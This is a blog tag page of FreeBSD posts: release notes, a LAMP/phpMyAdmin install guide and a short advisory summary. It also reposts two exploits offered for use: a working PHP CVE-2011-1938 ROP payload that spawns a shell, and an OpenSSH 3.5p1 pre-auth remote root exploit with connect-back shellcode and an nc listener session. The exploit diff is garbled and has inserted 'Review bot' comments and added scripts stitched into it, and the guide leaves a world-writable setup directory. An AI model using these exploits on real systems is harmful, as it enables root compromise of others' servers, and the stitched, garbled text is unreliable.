Posts Tagged ‘freebsd’

PC-BSD 9.0-BETA3 Released

Monday, October 3rd, 2011

Check out the DistroWatch release note:


PC-BSD Dru Lavigne has announced the availability of the third beta release of PC-BSD 9.0, a user-friendly desktop operating system based on FreeBSD: “The third BETA release of the upcoming PC-BSD 9.0 is now available. This release includes the latest FreeBSD 9.0-BETA3 base, along with numerous bug fixes and enhancements. Changelog: fix issue enabling Flash plugin after installation; fix bug with handbook not launching in LXDE; fix issue performing updates on ZFS systems with separate /boot UFS partition; add lxmenu-data port which provides nicer LXDE menu framework; fix enabling iBus from GDM; include ‘mga’ driver in base; add option to install only Openbox as a window manager; fix bug doing PBI patching and checking the FreeBSD version….” Here is the full release announcement. Download links to the installation and live DVD images: PCBSD9.0-BETA3-x86-DVD.iso (3,179MB, SHA256), PCBSD9.0-BETA3-x86-DVD-live.iso (1,706MB, SHA256), PCBSD9.0-BETA3-x64-DVD.iso (3,292MB, SHA256), PCBSD9.0-BETA3-x64-DVD-live.iso (1,838MB, SHA256).


Source: http://distrowatch.com/6914

FreeBSD 9.0-BETA2 Released

Thursday, September 15th, 2011

Ken Smith has announced the availability of the second beta of FreeBSD 9.0, more than a month later than planned: “The second beta build of the 9.0-RELEASE release cycle is now available. Note: the location of the FTP install tree and ISOs have changed slightly. What we used for BETA2 reflects a directory structure that would let us fully utilize building and distributing a wider variety of architectures. The new layout does add some extra complexity, so we’re actively discussing whether or not to change the layout from previous releases, and if we do change it whether or not to change it this much. What’s there now can be viewed as an almost ‘worst-case’ scenario. It’s entirely possible we’ll back off and revert to the old layout despite that layout potentially limiting.” There is much more information in the release announcement, including notes on what to test. Download links for the i386 and amd64 ISO images: FreeBSD-9.0-BETA2-i386-dvd1.iso (498MB, SHA256), FreeBSD-9.0-BETA2-amd64-dvd1.iso (607MB, SHA256).

Source: http://distrowatch.com/6875


How to install Apache, PHP, MySQL, phpMyAdmin and memcached on FreeBSD 7

Monday, July 4th, 2011

Let's start by installing MySQL.

We need to go into the MySQL port directory:

cd /usr/ports/databases/mysql51-server

Next, set the port's build options:

make BUILD_OPTIMIZED=yes BUILD_STATIC=yes

In the same directory, install MySQL:

make install clean

We need to enable MySQL as a service that starts at boot.
To do so, add the following to the end of /etc/rc.conf:

mysql_enable="YES"

Now copy MySQL's default configuration file into the configuration directory, under its real name:

cp /usr/local/share/mysql/my-medium.cnf /etc/my.cnf

To start the freshly installed MySQL, run:

/usr/local/etc/rc.d/mysql-server start

Now we need to set the MySQL root password:

/usr/local/bin/mysqladmin -u root password 'SUA NOVA SENHA AQUI'

Now that MySQL is fully installed, let's turn to Apache; we'll install version 2.2:

cd /usr/ports/www/apache22

Install it with the following command, from inside the directory we just entered with cd:

make install clean

To make sure the big guy comes up properly at boot, put the following entry at the end of /etc/rc.conf:

apache22_enable="YES"

We also enable this in another file, /boot/loader.conf, by adding the following entry there:

accf_http_load=YES

Now let's install PHP5 on the thing. For that we go into the php5 port directory:

cd /usr/ports/lang/php5

Run the install:

make install clean

As for PHP5 extensions, installing any of them follows this pattern:

PDFlib-Lite (taken here as the example)

fetch ftp://ftp.swin.edu.au/gentoo/distfiles/PDFlib-Lite-7.0.2.tar.gz
sudo mv PDFlib-Lite-7.0.2.tar.gz /usr/ports/distfiles/

Now go to the php5 extensions directory:

cd /usr/ports/lang/php5-extensions

Enable the extensions you want:

make install clean

Put php.ini in its proper place:

cp /usr/local/etc/php.ini-dist /usr/local/etc/php.ini

To enable PHP as an Apache 2.2 module we need to add the PHP entries. At the end of /usr/local/etc/apache22/httpd.conf, put this:
AddType application/x-httpd-php .php
AddType application/x-httpd-php-source .phps

Now make index.php the default in document roots; for that, change (still in the Apache conf):
DirectoryIndex index.html
to
DirectoryIndex index.php index.html

Edit Apache's language configuration, /usr/local/etc/apache22/extra/httpd-languages.conf, and add the following at its end:
AddDefaultCharset On

To apply our changes, run:
/usr/local/etc/rc.d/apache22 start
The command above restarts Apache, which applies our changes.

Let's install memcached, a superb tool for PHP. We'll use PECL (a PHP add-on):

cd /usr/ports/databases/pecl-memcache

To install it, run the command below:

make install clean

Now the memcached installation itself:

cd /usr/ports/databases/memcached

make install clean

Let's have our FreeBSD box start it at boot; in /etc/rc.conf add:

memcached_enable="YES"

And to wrap up the fun:

/usr/local/bin/memcached -d -u nobody

To get phpMyAdmin going we'll do the following:

cd /usr/ports/databases/phpmyadmin

Inside the directory above, install it straight from the port:

make install clean

phpMyAdmin itself is now installed on your FreeBSD, but we have to create an Alias in Apache to put the house in order. We'll do the following inside the Apache conf -> /usr/local/etc/apache22/httpd.conf:

In the section ->
Put the following inside that Apache tag:

Alias /phpmyadmin /usr/local/www/phpMyAdmin

And to round things off, inside Apache we must create a Directory block so that phpMyAdmin is open to web access; for that, add the following:

<Directory "/usr/local/www/phpMyAdmin">
Order allow,deny
Allow from all
</Directory>

Remember the Alias stays outside of it, OK?
Now let's enable phpMyAdmin's config

cd /usr/local/www/phpMyAdmin
mkdir config
chmod 777 config

Shall we switch on our mess??? We need to restart Apache now:

/usr/local/etc/rc.d/apache22 restart

To fine-tune your phpMyAdmin, open your browser at an address of the following form:

http://ip_do_FREEBSD/phpmyadmin/scripts/setup.php

Change the Authentication Type to HTTP,
Delete ROOT from "User for config auth",
You can leave everything else as it is and then click Add to add the new server.
Clicking Save saves the phpMyAdmin configuration.

Let's put our config in place:

cp config/config.inc.php .

Delete what is no longer needed, give the config correct and safe permissions, and that wraps up our how-to:

rm -rf config
chmod 444 config.inc.php

To access your web content use the directory: /usr/local/www/data/
And to access phpMyAdmin use: http://IP_FREEBSD/phpmyadmin/

The end 😛
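As an added example (not part of the original how-to), the following POSIX shell script checks the outcome of the steps above against two of the ways they typically go wrong when copied from a web page: rc.conf lines pasted with typographic quotes, which rc(8) will not read as YES, and a phpMyAdmin install where the config/ directory was left behind or config.inc.php stayed writable. It runs only against constructed sample files in a temporary directory; the function names and the fixture layout are the example's own.

```shell
#!/bin/sh
# Post-install check for the how-to above. This is an added example, not part
# of the original post, and it runs only against constructed sample files in a
# temporary directory, so it can be tried on any machine.

# rc_enable_ok FILE SERVICE
# rc(8) sources rc.conf as shell and checkyesno() accepts yes/true/on/1 in any
# case. A line pasted with typographic quotes, e.g. mysql_enable=”YES”, assigns
# the literal string ”YES”, so the service silently never starts at boot.
# Exit status: 0 enabled, 1 line missing or not a "yes" value,
# 2 typographic quotes found on the line.
rc_enable_ok() {
    file=$1; svc=$2
    lq=$(printf '\342\200\234'); rq=$(printf '\342\200\235')    # U+201C, U+201D
    line=$(LC_ALL=C grep "^${svc}_enable=" "$file" | tail -n 1)  # last assignment wins
    [ -n "$line" ] || return 1
    case $line in
        *"$lq"*|*"$rq"*) return 2 ;;
    esac
    value=${line#*=}
    value=$(printf '%s\n' "$value" | tr -d "\"'")               # strip straight quotes
    case $value in
        [Yy][Ee][Ss]|[Tt][Rr][Uu][Ee]|[Oo][Nn]|1) return 0 ;;
        *) return 1 ;;
    esac
}

# pma_config_ok DIR
# The how-to ends by copying config/config.inc.php up one level, removing the
# mode-777 config/ directory and making the file mode 444. Exit status:
# 0 all three done, 1 config.inc.php missing, 2 config/ still present,
# 3 config.inc.php writable by group or others.
pma_config_ok() {
    dir=$1
    [ -f "$dir/config.inc.php" ] || return 1
    [ ! -e "$dir/config" ] || return 2
    case $(ls -l "$dir/config.inc.php" | cut -c6,9) in          # group/other write bits
        *w*) return 3 ;;
    esac
    return 0
}

# make_fixture: constructed rc.conf and two phpMyAdmin trees (one finished,
# one where the cleanup steps were skipped). Prints the directory.
make_fixture() {
    tmp=$(mktemp -d) || return 1
    {
        printf 'apache22_enable="YES"\n'
        printf 'mysql_enable=\342\200\235YES\342\200\235\n'     # pasted with typographic quotes
        printf 'memcached_enable="YES"\n'
    } > "$tmp/rc.conf"
    mkdir -p "$tmp/phpMyAdmin" "$tmp/phpMyAdmin-unfinished/config"
    printf '<?php $cfg = array();\n' > "$tmp/phpMyAdmin/config.inc.php"
    chmod 444 "$tmp/phpMyAdmin/config.inc.php"
    printf '<?php $cfg = array();\n' > "$tmp/phpMyAdmin-unfinished/config.inc.php"
    chmod 666 "$tmp/phpMyAdmin-unfinished/config.inc.php"
    printf '%s\n' "$tmp"
}

report_rc() {
    rc_enable_ok "$1" "$2" && s=0 || s=$?
    case $s in
        0) echo "$2: enabled at boot" ;;
        2) echo "$2: typographic quotes on the ${2}_enable line, rc(8) will not start it" ;;
        *) echo "$2: not enabled" ;;
    esac
}

report_pma() {
    pma_config_ok "$1" && s=0 || s=$?
    case $s in
        0) echo "$1: config.inc.php in place, config/ removed, file read-only" ;;
        1) echo "$1: config.inc.php missing" ;;
        2) echo "$1: setup directory config/ still present" ;;
        3) echo "$1: config.inc.php is group- or world-writable" ;;
    esac
}

FIXTURE=$(make_fixture)
for svc in apache22 mysql memcached; do report_rc "$FIXTURE/rc.conf" "$svc"; done
report_pma "$FIXTURE/phpMyAdmin"
report_pma "$FIXTURE/phpMyAdmin-unfinished"
```

Run it with sh. On a real host, point rc_enable_ok at /etc/rc.conf and pma_config_ok at /usr/local/www/phpMyAdmin; the sample rc.conf deliberately reproduces the curly-quoted mysql_enable line so you can see what a blind copy-paste of the how-to produces.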


PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938

Monday, July 4th, 2011

<?php
/*
** Jonathan Salwan - @shell_storm
** http://shell-storm.org
** 2011-06-04
**
** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938
**
** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c
** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary
** code via a long pathname for a UNIX socket.
*/

echo "[+] PHP 5.3.6 Buffer Overflow PoC (ROP)\n";
echo "[+] CVE-2011-1938\n\n";

# Gadgets in /usr/bin/php
define('DUMMY', "\x42\x42\x42\x42"); // padding
define('STACK', "\x20\xba\x74\x08"); // .data 0x46a0 0x874ba20
define('STACK4', "\x24\xba\x74\x08"); // STACK + 4
define('STACK8', "\x28\xba\x74\x08"); // STACK + 8
define('STACK12', "\x3c\xba\x74\x08"); // STACK + 12
define('INT_80', "\x27\xb6\x07\x08"); // 0x0807b627: int $0x80
define('INC_EAX', "\x66\x50\x0f\x08"); // 0x080f5066: inc %eax | ret
define('XOR_EAX', "\x60\xb4\x09\x08"); // 0x0809b460: xor %eax,%eax | ret
define('MOV_A_D', "\x84\x3e\x12\x08"); // 0x08123e84: mov %eax,(%edx) | ret
define('POP_EBP', "\xc7\x48\x06\x08"); // 0x080648c7: pop %ebp | ret
define('MOV_B_A', "\x18\x45\x06\x08"); // 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('MOV_DI_DX', "\x20\x26\x07\x08"); // 0x08072620: mov %edi,%edx | pop %esi | pop %edi | pop %ebp | ret
define('POP_EDI', "\x23\x26\x07\x08"); // 0x08072623: pop %edi | pop %ebp | ret
define('POP_EBX', "\x0f\x4d\x21\x08"); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('XOR_ECX', "\xe3\x3b\x1f\x08"); // 0x081f3be3: xor %ecx,%ecx | pop %ebx | mov %ecx,%eax | pop %esi | pop %edi | pop %ebp | ret

$padd = str_repeat("A", 196);

$payload = POP_EDI. // pop %edi
STACK. // 0x874ba20
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"//bi". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK4. // 0x874ba24
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"n/sh". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK8. // 0x874ba28
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
MOV_A_D. // mov %eax,(%edx)
XOR_ECX. // xor %ecx,%ecx
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
POP_EBX. // pop %ebx
STACK. // 0x874ba20
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INT_80; // int $0x80

$evil = $padd.$payload;

$fd = socket_create(AF_UNIX, SOCK_STREAM, 1);
$ret = socket_connect($fd, $evil);
?>

Source: http://www.exploit-db.com/exploits/17486/

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

Thursday, June 30th, 2011

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

Discovered and Exploited By Kingcope
Year 2011
--
The last two days I have been investigating a vulnerability in OpenSSH
affecting at least FreeBSD 4.9 and 4.11. These FreeBSD versions run
OpenSSH 3.5p1 in the default install.
The sshd banner for 4.11-RELEASE is "SSH-1.99-OpenSSH_3.5p1 FreeBSD-20060930".
A working Remote Exploit which spawns a root shell remotely and
previous to authentication was developed.
The bug can be triggered both through ssh version 1 and ssh version 2
using a modified ssh client. During the investigation of the vulnerability it was found that
the bug resides in the source code file "auth2-pam-freebsd.c".
http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/openssh/Attic/auth2-pam-freebsd.c
This file does not exist in FreeBSD releases greater than 5.2.1. The last commit
is from 7 years ago.
Specifically the bug follows a code path in the PAM Authentication Thread inside this
source code, "pam_thread()". It could not be verified if the bug is inside this
(third party, freebsd) OpenSSH code or in the FreeBSD pam library itself.
Both the challenge response (ssh version 1) and keyboard interactive via pam
(ssh version 2) authentications go through this code path.
By supplying a long username to the daemon the sshd crashes.
h4x# sysctl kern.sugid_coredump=1
kern.sugid_coredump: 0 -> 1
root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138
h4x# tail -1 /var/log/messages
Jun 30 16:01:25 h4x /kernel: pid 160 (sshd), uid 0: exited on signal 11 (core dumped)
Looking into the coredump reveals:
h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x28092305 in ?? ()
(gdb) x/1i $eip
0x28092305:     (bad)
The sshd crashes at a place with illegal instructions. It looks like it depends
on how the sshd is started. Starting the sshd from the console as root and running
the ssh client with long username again reveals:
h4x# killall -9 sshd
h4x# /usr/sbin/sshd
root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138
h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) x/10i $eip
0x41414141:     Cannot access memory at address 0x41414141.
As you can see in the above gdb output we can control EIP completely.
If someone finds out on what this behaviour depends, especially why EIP can
be controlled when starting sshd in the console and can not be easily controlled
when being run from the boot sequence, please drop me an email at
isowarez.isowarez.isowarez (at) googlemail.com
Anyhow this procedure shows that the sshd can be exploited because the instruction
pointer can be fully controlled.
The developed exploit (Proof of Concept only) is a patched OpenSSH 5.8p2 client.
Using a reverse shellcode it will spawn a rootshell.
Only one offset is needed, the position of the shellcode can be found the following way:
h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) set $x=0x08071000
(gdb) while(*++$x!=0x90909090)
>end
(gdb) x/10b $x
The printed address is the beginning of the shellcode nopsled.
Attached is the Proof of Concept as a diff to OpenSSH-5.8p2.
It roughly does the following:
root@debian:~# ./ssh -1 192.168.32.138
root@debian:~# nc -v -l -p 10000
listening on [any] 10000 ...
192.168.32.138: inverse host lookup failed: Unknown host
connect to [192.168.32.128] from (UNKNOWN) [192.168.32.138] 1038
uname -a;id;
FreeBSD h4x.localdomain 4.11-RELEASE FreeBSD 4.11-RELEASE #0: Fri Jan 21 17:21:22 GMT 2005     root (at) perseus.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
uid=0(root) gid=0(wheel) groups=0(wheel)
--
root@debian:~# diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,717
> // Connect Back Shellcode
>
> #define       IPADDR  "xc0xa8x20x80"
> #define PORT  "x27x10"              /* htons(10000) */
>
> char sc[] =
>    "x90x90"
>    "x90x90"
>    "x31xc9"                 // xor    ecx, ecx
>    "xf7xe1"                 // mul    ecx
>    "x51"                     // push   ecx
>    "x41"                     // inc    ecx
>    "x51"                     // push   ecx
>    "x41"                     // inc    ecx
>    "x51"                     // push   ecx
>    "x51"                     // push   ecx
>    "xb0x61"                 // mov    al, 97
>    "xcdx80"                 // int    80h
>    "x89xc3"                 // mov    ebx, eax
>    "x68"IPADDR                       // push   dword 0101017fh
>    "x66x68"PORT             // push   word 4135
>    "x66x51"                 // push   cx
>    "x89xe6"                 // mov    esi, esp
>    "xb2x10"                 // mov    dl, 16
>    "x52"                     // push   edx
>    "x56"                     // push   esi
>    "x50"                     // push   eax
>    "x50"                     // push   eax
>    "xb0x62"                 // mov    al, 98
>    "xcdx80"                 // int    80h
>    "x41"                     // inc    ecx
>    "xb0x5a"                 // mov    al, 90
>    "x49"                     // dec    ecx
>    "x51"                     // push   ecx
>    "x53"                     // push   ebx
>    "x53"                     // push   ebx
>    "xcdx80"                 // int    80h
>    "x41"                     // inc    ecx
>    "xe2xf5"                 // loop   -10
>    "x51"                     // push   ecx
>    "x68x2fx2fx73x68"     // push   dword 68732f2fh
>    "x68x2fx62x69x6e"     // push   dword 6e69622fh
>    "x89xe3"                 // mov    ebx, esp
>    "x51"                     // push   ecx
>    "x54"                     // push   esp
>    "x53"                     // push   ebx
>    "x53"                     // push   ebx
>    "xb0xc4x34xff"
>    "xcdx80";                // int    80h
>
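Review bot: the comments beside the IPADDR and PORT pushes no longer match the defines above them: IPADDR is the four bytes c0 a8 20 80 (192.168.32.128, the listener shown in the session earlier in the post) while the comment still reads 'push dword 0101017fh', and PORT is htons(10000) while the comment says 'push word 4135'; the line with bytes b0 c4 34 ff is the only one carrying no comment at all. Update those three comments so the listing documents what it actually pushes. As reproduced here the backslash has also been lost from every escape sequence ('x90x90', 'x31xc9'), so the hunk should be read against the original diff at the exploit-db link rather than taken as shown.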
679a730,737
>       char buffer[8096];
>
>       // Offset is for FreeBSD-4.11 RELEASE OpenSSH 3.5p1
>       memcpy(buffer, "AAAAx58xd8x07x08""CCCCDDDDEEEExd8xd8x07x08""GGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO", 24);
>       memset(buffer+24, 'x90', 5000);
>       memcpy(buffer+24+5000, sc, sizeof(sc));
>       server_user=buffer;
>
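Review bot: memcpy(buffer, "AAAAx58...OOOO", 24) copies only the first 24 bytes of that literal, so everything from 'GGGG' onward is dead text that should be dropped rather than left to mislead a reader about the layout; a comment naming what the 24 bytes are (the two four-byte addresses plus filler) would help, since the line above only says which release the offset is for. Separately, 'x90' in the memset is a multi-character constant as printed here (the backslash was lost in reproduction), so the hunk does not build as shown. The sizes do fit: 24 + 5000 + sizeof(sc) is well under the 8096-byte buffer, and sizeof(sc) includes the terminating NUL.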
690a749
>
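Review bot: this hunk adds nothing but an empty line after line 690; drop it from the patch so the diff carries only the two real changes.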
Cheers,

Kingcope


Source: http://www.exploit-db.com/exploits/17462/
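The kernel line Kingcope pulls from /var/log/messages is also the cheapest detection signal for this bug on an unpatched host: sshd dying on SIGSEGV before any authentication has happened. The following POSIX shell script is an added example, not part of the advisory; it counts and extracts such kernel log lines from a constructed sample log (the first line is the one quoted above, the other three are made up, including a normal sshd login line and a crash of a different daemon, neither of which must count). The function names and the alert threshold are the example's own.

```shell
#!/bin/sh
# Added detection example; not part of Kingcope's advisory. The FreeBSD kernel
# logs a setuid daemon dying on a signal as
#   pid N (sshd), uid U: exited on signal 11
# and appends "(core dumped)" only when kern.sugid_coredump allowed the dump,
# so we key on the signal, not on the suffix.

# sshd_crash_count FILE: number of sshd SIGSEGV exits recorded in FILE
sshd_crash_count() {
    grep -c '(sshd), uid [0-9][0-9]*: exited on signal 11' "$1" || true  # grep -c exits 1 on zero matches
}

# sshd_crash_pids FILE: the pids of those crashes, one per line
sshd_crash_pids() {
    sed -n 's/.*pid \([0-9][0-9]*\) (sshd), uid [0-9][0-9]*: exited on signal 11.*/\1/p' "$1"
}

# sshd_crash_alert FILE THRESHOLD: exit 0 when FILE holds at least THRESHOLD crashes
sshd_crash_alert() {
    n=$(sshd_crash_count "$1")
    [ "$n" -ge "${2:-1}" ]
}

# make_sample_log: constructed messages file; line 1 is the one quoted in the
# advisory, lines 2-4 are invented (no core dump, a normal login, another daemon).
make_sample_log() {
    tmp=$(mktemp) || return 1
    cat > "$tmp" <<'EOF'
Jun 30 16:01:25 h4x /kernel: pid 160 (sshd), uid 0: exited on signal 11 (core dumped)
Jun 30 16:03:10 h4x /kernel: pid 171 (sshd), uid 0: exited on signal 11
Jun 30 16:05:00 h4x sshd[180]: Accepted publickey for ops from 192.0.2.10 port 40001 ssh2
Jun 30 16:06:42 h4x /kernel: pid 190 (httpd), uid 80: exited on signal 11 (core dumped)
EOF
    printf '%s\n' "$tmp"
}

LOG=$(make_sample_log)
echo "sshd crashes: $(sshd_crash_count "$LOG")"
echo "pids: $(sshd_crash_pids "$LOG" | tr '\n' ' ')"
if sshd_crash_alert "$LOG" 2; then
    echo "ALERT: repeated pre-auth sshd SIGSEGV; correlate with sshd connection logs for the peer address"
fi
```

On a real host run the functions against /var/log/messages (or wherever kern.* facility lines land); a single crash can be a fluke, but several within minutes from the same peer is the pattern the session above produces, which is why the alert takes a threshold.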

BLOG: Vulnerability compromises FTP use on Unix-like servers

Thursday, October 7th, 2010

Some very important news was published recently. The libc glob library is what this exploit uses, as the site http://securityreason.com/securityalert/7822 describes in detail. According to the publication, the vulnerability has already hit large companies, even Adobe. Here is an excerpt:

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/
Date:
- Dis.: 06.11.2009
- Pub.: 07.10.2010

CVE: CVE-2010-2632

Affected Software (verified):
- OpenBSD 4.7
- NetBSD 5.0.2
- FreeBSD 7.3/8.1
- Oracle Sun Solaris 10
- GNU Libc (glibc)

Affected Ftp Servers:
- ftp.openbsd.org (verified 02.07.2010: "connection refused" and ban)
- ftp.netbsd.org (verified 02.07.2010: "connection limit of 160 reached" and ban)
- ftp.freebsd.org
- ftp.adobe.com
- ftp.hp.com
- ftp.sun.com
- more more and more

Affected Vendors (not verified):
- Apple
- Microsoft Interix
- HP
- more more more

The main advisory is at http://securityreason.com/achievement_securityalert/89

We will be following this thread closely.
We will report back if we find out anything more about this far-reaching news.